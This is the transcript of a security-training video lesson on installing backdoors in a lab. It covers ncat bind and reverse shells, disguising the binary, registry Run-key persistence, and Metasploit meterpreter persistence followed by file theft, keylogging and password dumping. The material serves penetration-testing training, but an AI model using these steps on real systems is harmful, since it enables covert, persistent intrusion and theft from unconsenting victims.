Welcome to this eLearn Security video training lesson on backdoors. Today we are going to take a look at a couple of tools that can be very useful to create a stable connection on a remote machine. The first tool we are going to see is NCAT. NCAT is a network utility that runs on TCP and UDP and allows you to read and write on network connections. It is an improved version of the famous NetCat tool. It is highly dynamic with its options and extremely popular among the attackers. You can download NCAT at the following address: www.nmap.org/NCAT/. Once you have NCAT installed, open a new terminal window and execute the program using the NCAT command. On Kali Linux, it is already installed. Indeed, we can see that in order to work, we need to specify to the host to connect to. To see the available options, we can run two commands: man NCAT or NCAT-H. Man NCAT is much more detailed, so let's run the command and see what we get. At the very beginning of the manual, we can see the syntax to use to work with NCAT. While if we scroll down a bit, we can see all of the available options that we can set. In this example, the options we will primarily focus on, such as the -L for listening mode, the -E option to execute the file, the -P option for port, and the -V for verbose. Now we can switch over to our victim machine and take a look at NCAT in action on the other side. For this scenario, we have already compromised the victim machine and uploaded a Windows version of NCAT on it. Keep in mind that you must upload the version of NCAT from the victim OS, otherwise it won't work. In order to conceal the NCAT library, we have moved it to the Windows System 32 folder and renamed it WinConfig. Now, from the victim machine, we can start the NCAT program by opening a terminal window and execute the file with the correct parameter. In this example, we will use WinConfig, as this is the NCAT binary name, with the -L option to tell the tool to go into listen mode. We will use the -P option to define the port. 5555 will be the port then. -E to execute the file, and then the file to execute. We will use cmd.exe, so it will return a command prompt. Now we can hit enter to execute the program. Note that the program has gone into listen mode and waits for a connection. Now we can switch back to our attacker computer. On this system, we can open a shell by using the NCAT command along with the victim IP address, which is 192.168.102.152, and the listener port 5555, and press enter. We can see that we have control of the victim as we are able to do a directory of the remote machine, or change and navigate the remote system. We can even execute commands such as ipconfig and see that we are actually in the victim machine. Now, what if our victim is on an internal network and not so easy to get from the internet? It will make it more difficult for us to execute a listener and connect to the victim. NCAT can overcome this limitation by performing a reverse connection. In the previous scenario, you noticed that the victim had the listener. In a reverse connection, the attacker has the listener running, and the victim initiates the connection from within the protected network to the attacker outside of the network. So let's explore how this is done. We go back to our attacker machine, bring up the terminal window, and start NCAT, and have a listener with the -L option, -P for port 5555 as the port to listen on, and we want NCAT to give us verbose information with the -V option. Once we hit enter, we see it goes into listening mode. Now we have to wait for the victim to attach to the listener port. We can now switch back to the victim machine and execute the command to attach the attacker machine with the winconfig -E cmd.exe, the attacker IP, and the port. Once that happens, we can see that in the attacker system, the connection has been established, and once again, we have access to our victim system. Now, we're going to create a persistent backdoor with NCAT. With persistence backdoor, we mean that we managed to install in some way a process or a service that will start at the boot of the victim machine and tie the connection to our attacker machine. In this way, even if the victim reboots the machine, the backdoor will still work. To set a persistent backdoor with NCAT, we can do it by adding the necessary command key to the victim registry. Let's see how to do this by starting from our attacker machine and set up our listener. We will use the NCAT-L -P5544 -V command. Now switching to our victim machine, we have to add the NCAT command structure to the proper place in the registry. So we will click on Start and then run regedit. Now we can see that the Windows regedit displays. We now have to navigate to the HKey local machine /software/Microsoft /Windows /current version /run. Here we want to add a string value for the winconfig binary. To do this, we right-click and select New, then select String Value and type winconfig to the field on the left. Then we have to double-click on the entry to edit its value. In this dialog, we have to insert the command we want to run, which in our case is the path to winconfig. Followed by the IP address of the attacker machine, the port to connect on, then we use the -E option to execute the cmd.exe program. Once we are done, we can click OK. Now you can see how the entry in the Windows registry looks. Now that everything is set, we can restart the victim machine to activate the backdoor. While the machine is booting, let's switch to our attacker machine and see what happens. We see that so far nothing is happening since the user is not logged in yet. So let's log in and then switch back to our attacker machine. As we can see, as soon as the victim logs in, we can see that the victim machine contacts the attacker machine. Now that the persistence backdoor is established, anytime the victim logs in, we will have access from our attacker machine. Besides NCAT, there are plenty of backdoors that we can use, everyone with its own features and interfaces. Most of them offer some very interesting features that allow the attacker to run activities in a few clicks, such as browsing in remote system folders, activate services, killing processes, but also run keylogging activities or simply downloading or uploading files to and from the remote machine. For this second part of the video lesson, we are going to use Metasploit and its meter-preter shell. Do not worry if you haven't used Metasploit yet. We will cover it soon. For this scenario, we suppose we already have exploited the remote machine and that we have a meter-preter session on the machine. For your information, a meter-preter session is an active and interactive connection between us and the victim machine. It is similar to the previous shell obtained with NCAT, but it offers many other features. So let's see how we can create and install backdoor on the victim, and then execute commands and script in order to obtain information from it. The easiest way is to install a backdoor on the remote system from the meter-preter shell. The easiest way to install a backdoor on the remote system from the meter-preter shell is by running the module named s4u_persistence. The first step is to select the module in Metasploit, so let's use the following command. Use exploit /windows/local/s4u_persistence. Before running it, let's see what options we can set by running the command show options. Here we just have to set the current MeterPreter session on which we want to run the module. As we already know, we have an active session on the machine, and we can check the ID by typing sessions in the terminal. So here's the ID. Let's set it in the module configurations by typing set session 2. Now we can choose when to trigger the exploit. As we can see here, we can set it for a specific event, when the user locks the computer and so on. In this scenario, let's say we want to set it when the user logs on. So let's run the command set trigger logon. We can leave the rest of the parameters as they are and continue the module configuration by setting the type of payload we want to use. Depending on the payload, we can get a simple command shell or a MeterPreter shell. Since the latter is much better and stable, we will use it by running the command set payload Windows/MeterPreter/reverse_TCP. In the same way we previously set the IP address and the port for the connection, we will do the same here using the command set lhost and set lport. In this case, we want to run the listener on our local IP address on port 1234. Now that everything is set, we can run the module by typing exploit. As we can see in the output, the module creates and starts the handler that will wait for the incoming connection from the victim. Then the script creates the backdoor with the options just set and uploads the backdoor on the remote system. Since we didn't specify a custom path, it is uploaded in the temp folder of the current user. Once on the victim machine, the script sets the event that triggers the backdoor, and after a few lines, we can see the message that the backdoor has been successfully created. It also prints some commands that we can use to delete the task and the payload from the victim machine. As we can see, we just configured a few options, and the module performed all these operations automatically. The next step is to check if the backdoor really works. We just have to create a listener that will wait for the connection. We can do this from the Metasploit console in just a few steps. The first thing to do is to use the correct module, which is exploit/multi/handler. We need to set just a few options in this module, such as the payload to use, which will be the same set before, and then the IP address, and the port on which we want to listen for a connect back. We can see the current configuration by running the command show options. Here we can see we have already set the payload to Windows/MeterPreter/reverse_TCP, which is the same payload used by the backdoor. We can check it inspecting the previous command output. The IP address is already set too, so we just need to configure the port, which in this case will be 1234. To do this, let's just type set lport, followed by the port number. If we run show options again, we can see that the value is now changed. Now, the module should be ready, so we can start it by running the exploit command. To test the backdoor, we have to reboot the victim machine, so let's move into the victim machine. Of course, the previous session terminates since the machine went down, but if everything works, we should get a new session after the user logs on. So let's switch back on the victim machine, type in the password, and then switch back to the attacker. As we can see, as soon as the user logs in, we get a new MeterPreter session. We can verify we are interacting with the right machine by running the command ifconfig. And here we are. The IP is the same one as our victim. So this is a simple method of installing a backdoor on the victim machine, but as we said earlier, We created this session because it's very powerful. Indeed, once here, we can run a lot of useful commands in order to get information on the machine. For example, let's get some screenshots from the victim. To do this, we can just type screenshot and press enter. Here we can see that a new file has been created. Let's open it by running EOG, followed by the path of the file. Here we are. This is the current view of the victim machine. Of course, this is not all we can do. For example, we can browse the victim machine from here. For example, let's say we want to navigate to the desktop folder and inspect what is in the important folder. Here we can see a TXT file. We can inspect it from here by running cat followed by the file name. But we also can download and upload files. By writing download, the file name and then the path where to store the file, we can simply download it into our machine. Indeed, if we go see our desktop, here's the file. In the same way we download files, we can also upload files and folders. The command is very similar to the previous one, but instead of typing download, we just type upload. In order to get some information from the machine, we can run commands such as sysinfo. This returns some information about the target machine. We can also retrieve a list of running processes with the ps command. Here, we can see the PID, the process name, and some other information. As already said, there are a lot of commands that we can run. If you want a complete list, just type help. As we can see, we can dump the user passwords, we can record the microphone as well as the webcam, we can start a keylogger on the machine, we can execute custom commands or reboot the machine or even shut down the machine. For example, let's try this one by typing shutdown in the terminal. If we go on the victim machine, we can see that it is shutting down. And this concludes our video lesson on backdoors. Thanks very much for joining us.